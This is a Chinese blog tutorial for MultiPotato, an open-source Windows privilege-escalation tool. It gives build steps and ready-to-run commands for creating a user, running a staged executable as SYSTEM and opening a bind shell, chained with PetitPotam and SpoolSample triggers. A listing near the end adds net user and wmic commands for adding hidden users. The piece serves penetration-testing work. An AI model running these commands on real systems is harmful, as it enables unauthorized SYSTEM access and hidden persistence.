MultiPotato 使用教程

最新推荐文章于 2025-01-10 14:54:52 发布
最新推荐文章于 2025-01-10 14:54:52 发布
阅读量982 收藏 12
点赞数 20
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00068/article/details/142198747
版权

MultiPotato 使用教程

MultiPotato MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato

1. 项目介绍

MultiPotato 是一个用于权限提升的开源工具,由 @S3cur3Th1sSh1t 开发。它基于 @splinter_code 和 @decoder_it 的 RoguePotato 项目,但具有更高的灵活性。MultiPotato 不依赖特定的 SYSTEM 权限触发器,而是提供多种方法供用户选择,包括 CreateProcessWithTokenWCreateProcessAsUserWCreateUserBindShell 等。

MultiPotato 的核心功能是开启一个命名管道服务器,并模拟任何连接到该服务器的用户进行操作。这使得它能应对不同的系统认证触发器,例如结合 PetitPotam 或 SpoolSample 等公开的系统权限触发器来工作。

2. 项目快速启动

2.1 环境准备

确保你已经安装了 Git 和 Visual Studio 或任何支持 C++ 编译的开发环境。

2.2 克隆项目

git clone https://github.com/S3cur3Th1sSh1t/MultiPotato.git
cd MultiPotato

2.3 编译项目

使用 Visual Studio 打开 MultiPotato.sln 文件,并进行编译。编译完成后,你将得到一个可执行文件 MultiPotato.exe

2.4 运行示例

以下是一些常见的运行示例:

2.4.1 使用 CreateUser 技术
MultiPotato.exe -t CreateUser
2.4.2 使用 CreateProcessAsUserW 技术
MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
2.4.3 使用 BindShell 技术
MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

3. 应用案例和最佳实践

3.1 创建用户

你可以配合修改后的 PetitPotam 触发器使用 MultiPotato,如在 EFSRPC 漏洞利用中:

MultiPotato.exe -t CreateUser
PetitPotamModified.exe localhost/pipe/pwned localhost

3.2 进程创建

与 SpoolSample 一起使用,可通过 CreateProcessAsUserW 在目标系统上执行任意程序:

MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

3.3 远程命令执行

通过 BindShell 功能,MultiPotato 可以建立一个命令行交互式会话,允许远程控制:

MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

4. 典型生态项目

4.1 PetitPotam

PetitPotam 是一个公开的系统权限触发器,可以与 MultiPotato 结合使用,用于创建用户或执行其他操作。

4.2 SpoolSample

SpoolSample 是另一个常用的系统权限触发器,可以与 MultiPotato 结合使用,用于进程创建或远程命令执行。

4.3 MS-RPRN

MS-RPRN 是一个用于打印机服务的工具,可以与 MultiPotato 结合使用,用于触发 CreateProcessAsUserWBindShell 技术。

通过这些生态项目的结合,MultiPotato 可以在不同的场景下实现系统级别的权限提升,为安全研究人员和开发者提供了强大的工具支持。

MultiPotato MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato

红队内网攻防渗透:内网渗透之内网对抗:Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
HACKONE的博客
05-30 164
红队内网攻防渗透1. 内网权限提升技术1.1 windows内网权限提升技术--手工篇 1. 内网权限提升技术 1.1 windows内网权限提升技术–手工篇
multiotp:multiOTP开源强大的两因素身份验证PHP库,已通过OATH认证,具有TOTP,HOTP,Mobile-OTP,YubiKey,SMS和QRcode设置等
05-01
multiOTP开源 multiOTP开源是一个强大的两要素身份验证PHP类的GNU LGPL实现。 multiOTP开源软件已通过OATH认证,适用于HOTP / TOTP (c)2010-2021年SysCo通信系统 当前版本:5.8.2.1(2021-04-08) 二进制下载: : (包括虚拟设备映像) 可用的Docker容器: docker run --mount source = multiotp-data,target = / etc / multiotp -p 80:80 -p 443:443 -p 1812:1812 / udp -p 1813:1813 / udp -d multiotp / multiotp -开源 分发ZIP文件中包含一个Dockerfile 二进制下载适用于Windows 7/8 / 8.1 / 10/2012(R2)/ 2016的mu
multiOTP Credential Provider 使用教程
gitblog_00330的博客
10-10 981
multiOTP Credential Provider 使用教程 multiOTPCredentialProvider multiOTP Credential Provider is a V2 Credential Provider for Windows 7/8/8.1/10/2012(R2)/2016 with o...
告别黑客攻击!手把手教你在AD域中实施MultiOTP双因素身份验证(2FA)及避坑指南
shot_gan的博客
01-10 1222
下载 MultiOTP 服务器安装包:前往 MultiOTP 官方网站(https://download.multiotp.net/),根据你的操作系统版本选择合适的安装包进行下载(我下载的是multiotp_5.9.7.1版本)。确保在执行这些命令之前,你已经正确安装并配置了 multiOTP 系统,并且了解每个命令的具体作用,以便正确地进行配置。如果你在配置过程中遇到问题,可能需要检查 LDAP 服务器的设置,确保网络连接,或者查看 multiOTP 的日志文件以获取错误信息。
MultiPotato:灵活多变的权限提升工具
gitblog_00588的博客
09-14 450
MultiPotato:灵活多变的权限提升工具 MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato ...
探秘MultiPotato:灵活的权限提升工具
gitblog_00090的博客
05-21 353
探秘MultiPotato:灵活的权限提升工具 MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato 在网络安全领域,特别是在渗透测...
MultiPotato 项目使用教程
gitblog_01000的博客
09-14 382
MultiPotato 项目使用教程 MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato 1. ...
CS的安装和使用,以及提权操作
lrs328的博客
09-12 1041
新增用户net user [username] [password] /add删除用户net user [username] /delete新增隐藏用户wmic useraccount where "Name='[username]'" call rename "[username]$"删除隐藏用户wmic useraccount where "Name='[username]$'" call rename "[username]"
multiOTP配置安装
04-02 747
https://code.google.com/p/google-authenticator/ 是google提供的OTP解决方案。 http://www.multiotp.net/ 是一个开源otp验证解决方案,继承了google的OTP方案, 可以通过pam模块与Radius验证服务器集成,安装包已经包括了Radius和Google OTP 模块。 安装比较简单,下载之后解...
权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
SuperherRo的博客
03-23 2012
1、Web到Win-系统提权-土豆家族 2、Web到Win-系统提权-人工操作
【MATLAB例程】二维卡尔曼滤波的完整代码,仿真程序,线性系统的卡尔曼滤波(KF),带有误差统计与输出
05-14
该代码提供了一个完整的二维卡尔曼滤波实现,涵盖了从初始化、状态更新到结果可视化的全过程。适合用于学习卡尔曼滤波的基本原理和实际应用。
基于秃鹰搜索算法优化BP神经网络的多变量时间序列预测Matlab代码实现
05-14
内容概要:本文详细介绍了利用秃鹰搜索算法(BES)优化BP神经网络进行多变量时间序列预测的Matlab代码实现。首先进行了数据预处理,将输入输出数据归一化到[0,1]区间。接着重点讲解了BES算法的核心逻辑,包括初始化种群、适应度函数设计以及位置更新策略。特别强调了边缘初始化策略和Levy飞行函数的应用。最后展示了如何将优化后的参数应用于BP网络进行预测,并提供了实用的注意事项和性能提升建议。 适合人群:具有一定Matlab编程基础和技术背景的研究人员或工程师。 使用场景及目标:适用于需要进行多变量时间序列预测的科研项目或工程应用,旨在提高预测精度,特别是在数据波动较大时的优势更为明显。 阅读建议:读者可以在理解基本概念的基础上,逐步跟随代码实现过程,重点关注数据预处理、BES算法核心逻辑及其与BP网络的结合方式。同时,在实践中应注意代码中的细节提示,如归一化参数的一致性和并行计算的设置。
前端OCR识别:Vue3+Tesseract.js的文本识别方案.pdf
05-14
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Vue 3是一款备受瞩目的JavaScript框架,它采用了基于Proxy的响应式系统,显著提升了性能和调试能力。其Composition API带来了更高效的逻辑组织方式,使代码复用变得轻而易举。Tree-shaking支持让打包后的文件体积更小,进一步优化了应用性能。Vue 3还与TypeScript深度集成,提供了更完善的类型推导,让开发过程更加顺畅。无论是构建大型应用还是小型项目,Vue 3都能凭借其出色的性能和灵活的架构,帮助开发者高效完成任务,是现代Web开发的理想选择。
【铁路智能运维管理】基于Spring AI的铁路设备维修系统设计与实现:集成ZhiPu AI对话模型和RAG功能
05-14
内容概要:本文档介绍了基于“铁路智能运维管理系统”的Spring AI应用开发,重点展示了AI在“铁路设备维修”模块和专业知识顾问中的应用。开发环境需满足Spring Boot 3.2.x及以上版本和JDK 17及以上的要求。文档详细描述了如何引入必要的依赖项,如ZhiPu AI,并配置相关参数。具体实现包括普通聊天对话、检索增强生成(RAG)和工具调用三大功能。聊天对话通过配置ChatClient实现,RAG利用Redis Stack进行矢量数据库查询,而工具调用则通过ToolConfig类实现信息检索和采取行动。最后,文档指出当前项目的不足之处,如知识库庞大时工具回调受影响等问题。 适合人群:具备一定Java编程基础,尤其是熟悉Spring Boot框架的研发人员,特别是从事铁路智能运维系统开发的技术人员。 使用场景及目标:①了解如何在Spring Boot项目中集成AI功能;②掌握通过ZhiPu AI实现聊天对话、检索增强生成和工具调用的具体步骤;③探索AI在铁路设备维修管理和专业知识顾问中的应用场景。 其他说明:此项目仅展示了Spring AI的主要功能,相关业务逻辑尚不完善,且存在一些尚未解决的问题,如知识库庞大时工具回调的影响等。建议开发者在实践中不断优化和完善系统功能。
Vue3+Three.js性能调优:3D模型加载速度提升200%.pdf
05-14
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Vue 3是一款备受瞩目的JavaScript框架,它采用了基于Proxy的响应式系统,显著提升了性能和调试能力。其Composition API带来了更高效的逻辑组织方式,使代码复用变得轻而易举。Tree-shaking支持让打包后的文件体积更小,进一步优化了应用性能。Vue 3还与TypeScript深度集成,提供了更完善的类型推导,让开发过程更加顺畅。无论是构建大型应用还是小型项目,Vue 3都能凭借其出色的性能和灵活的架构,帮助开发者高效完成任务,是现代Web开发的理想选择。
手绘风格小动物素材教学课件模板.pptx
最新发布
05-14
手绘风格小动物素材教学课件模板
基于Maxwell模型的80至355极永磁同步电动机电磁设计方案及应用
05-14
内容概要:本文详细介绍了基于ANSYS Maxwell软件的80至355极三相调速永磁同步电动机的电磁设计方案。重点讨论了一种200-8极一字型冲片结构的18.5kW电机,转速为1500转/分钟,效率达1级能效。文中提供了详细的Maxwell建模流程,包括参数化扫描优化槽口宽度、路算与有限元分析结果对比、磁钢材料定义方法以及快速修改极数的方法。此外,还展示了如何利用Maxwell进行动态磁场模拟,使设计更加直观。 适合人群:从事电机设计、电磁仿真领域的工程师和技术人员。 使用场景及目标:适用于需要高效、可调速、可定制的永磁同步电动机设计项目。主要目标是提高设计效率,确保设计方案符合高性能标准,并能够快速响应客户需求变更。 其他说明:本文不仅提供了理论指导,还包括具体的实施步骤和代码示例,有助于读者更好地理解和应用相关技术。
多物种动物目标检测数据集5.zip
05-14
数据集介绍:多物种动物目标检测数据集 一、基础信息 数据集名称:多物种动物目标检测数据集 图片数量: - 训练集:7,767张 - 验证集:2,219张 - 测试集:1,110张 总计:11,096张覆盖多场景的动物图片 分类类别: 涵盖75个动物类别,包括: - 大型哺乳动物(熊、大象、长颈鹿、犀牛) - 珍稀物种(熊猫、红熊猫、树袋熊、海豹) - 水生生物(鲨鱼、海龟、水母、螃蟹) - 飞禽与昆虫(鹰、鹦鹉、蝴蝶、瓢虫) - 常见家畜(牛、马、猪、山羊) 标注格式: YOLO格式,含归一化边界框坐标及类别编号,可直接适配YOLOv5/v7/v8等主流框架。 二、适用场景 野生动物监测系统开发: 支持无人机航拍或野外摄像头数据中的动物识别,用于生物多样性研究和偷猎预警。 农业智能化管理: 检测农场牲畜(牛、羊、鸡)的健康状态与行为模式,优化养殖管理效率。 自然教育应用: 集成至AR自然观察工具,实时识别动物种类并提供生态知识讲解。 生物研究数据库建设: 为动物行为学、物种分布研究提供结构化视觉数据支撑。 安防边界预警: 识别特定危险动物(鳄鱼、毒蛇、蝎子),用于营地安全监控系统。 三、数据集优势 物种覆盖全面性: 包含陆地、水生、飞行等生态位的75类动物,涵盖从微型昆虫(瓢虫)到巨型生物(鲸鱼)的尺度跨度。 场景多样性: 整合航拍、地面拍摄、近距离特写等多视角数据,增强模型环境适应能力。 标注专业度: 严格校验的YOLO标注数据,边界框精准匹配动物形态特征,支持复杂遮挡场景检测。 跨领域适用性: 同时满足生态保护、农业管理、教育娱乐等多领域需求,提供从动物检测到细粒度分类的扩展能力。 模型兼容性: 标准YOLO格式支持快速迁移学习,可基于现有权重进行物种定制化模型开发。
化工领域NMP回收服务全球市场分析:预计2031年全球NMP回收服务市场规模将达到106万吨
05-14
N-甲基吡咯烷酮(NMP)是一种具有高极性、高沸点、低粘度、低挥发性、高热稳定性和化学稳定性的非质子溶剂。作为高性能溶剂,其广泛应用于锂离子电池制造、化工生产等多个领域。 NMP原料来源可分为合成NMP与再生NMP两类。合成NMP指通过化学合成工艺制得的NMP产品,其工业生产路线以γ-丁内酯(GBL)与单甲基胺为原料经缩合反应生成。再生NMP则指对使用后的NMP废液进行回收提纯 NMP废液特性: 高浓度NMP:废液中NMP含量较高,因NMP强溶解性可能混合多种有机物及无机物 低毒性但具刺激性:虽较其他有机溶剂毒性低,但高浓度接触仍对人体皮肤及眼睛产生刺激 处理难度大:因高沸点与强溶解性,单纯物理蒸发或自然挥发难以处理,需采用特定回收净化技术 严格环保要求:尤其在电池制造领域,NMP纯度要求极高,再生处理后的NMP纯度须达到同等标准,否则将影响产品质量与环境安全 NMP回收模式: 委托加工模式:回收企业为客户提供闭环循环服务,直接回收客户废液并提纯后返还。该模式可降低客户处理成本,实现资源循环利用 购销模式:回收企业采购上游供应商的NMP废液,经处理提纯后销售给下游客户,通过购销差价盈利 内部循环模式:大型企业集团自建回收处理设施,实现废液中NMP的内部循环利用。例如三菱重工在国内外建有溶剂回收装置,特别是随着全球锂电池需求增长,其海外工厂陆续采用现场回收设备,无需第三方处理即可实现NMP的直接回收提纯。 据QYResearch调研团队最新报告“全球NMP回收服务市场报告2025-2031”显示,预计2031年全球NMP回收服务市场规模将达到106万吨,未来几年年复合增长率CAGR为10.0%。
三相电压型PWM整流器的非线性二阶离散自抗扰控制技术及其应用
05-14
内容概要:本文详细探讨了三相电压型PWM整流器的非线性二阶离散自抗扰控制技术。文中介绍了电压外环采用非线性二阶离散自抗扰(ADRC)控制,而电流内环则使用传统的PI控制。ADRC通过跟踪微分器、扩张状态观测器和非线性状态反馈三个关键组件,实现了对系统状态和扰动的有效捕捉与补偿。实验结果显示,在负载变化情况下,ADRC能够显著提高系统的动态响应速度和稳定性,将直流母线电压波动从传统方案的±8V降低到±3V以内,恢复时间缩短了三分之二。此外,文章还提供了详细的参数调整方法和技巧,强调了观测器带宽和非线性函数参数的选择对于控制系统性能的重要影响。 适用人群:从事电力电子、自动控制领域的研究人员和技术人员,尤其是对PWM整流器和自抗扰控制感兴趣的读者。 使用场景及目标:适用于需要提升三相电压型PWM整流器动态响应速度和稳定性的应用场景。主要目标是帮助读者理解和掌握非线性二阶离散自抗扰控制技术的基本原理和实际应用,以及如何进行有效的参数调整。 其他说明:文章不仅提供了理论分析,还包括具体的MATLAB/Simulink实现代码和实验数据,有助于读者更好地理解和实践相关技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芮奕滢Kirby

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值